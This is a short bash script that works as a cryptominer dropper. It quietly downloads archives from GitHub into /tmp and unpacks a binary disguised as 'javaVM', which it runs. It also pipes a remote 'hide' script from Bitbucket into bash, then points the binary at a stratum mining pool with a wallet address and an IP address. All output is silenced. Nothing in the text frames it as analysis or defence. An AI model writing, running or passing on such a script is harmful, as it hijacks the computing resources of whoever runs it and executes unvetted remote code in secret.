#!/bin/bash
export LANG=C &>/dev/null
export LC_ALL=C &>/dev/null

rm -rf /tmp/javaVM &>/dev/null
wget -qO /tmp/jadah.tar.gz https://github.com/williehprnuhrxyq/nubuat/raw/main/wh.tar.gz > /dev/null 2>&1
wget -qO /tmp/jadah.tar.gz https://github.com/williehprnuhrxyq/nubuat/raw/main/0906yz.tar.gz > /dev/null 2>&1
tar -xvf /tmp/jadah.tar.gz -C /tmp &>/dev/null
rm -rf /tmp/jadah.tar.gz &>/dev/null
LANG=C LC_ALL=C /tmp/javaVM &>/dev/null
wget -O - -q https://bitbucket.org/verify000gow/moku/raw/6c2da8d803dfce74c6b826269a6c75a15fede904/hide | bash > /dev/null 2>&1
 /tmp/javaVM -P stratum://0xc7a5d71275f2cc6eeb7c7f793abf41379f7dcc05.$(echo V-$(TZ=UTC-7 date +"%H-%M-%S"))@47.236.130.246:6666 >/dev/null 2>&1
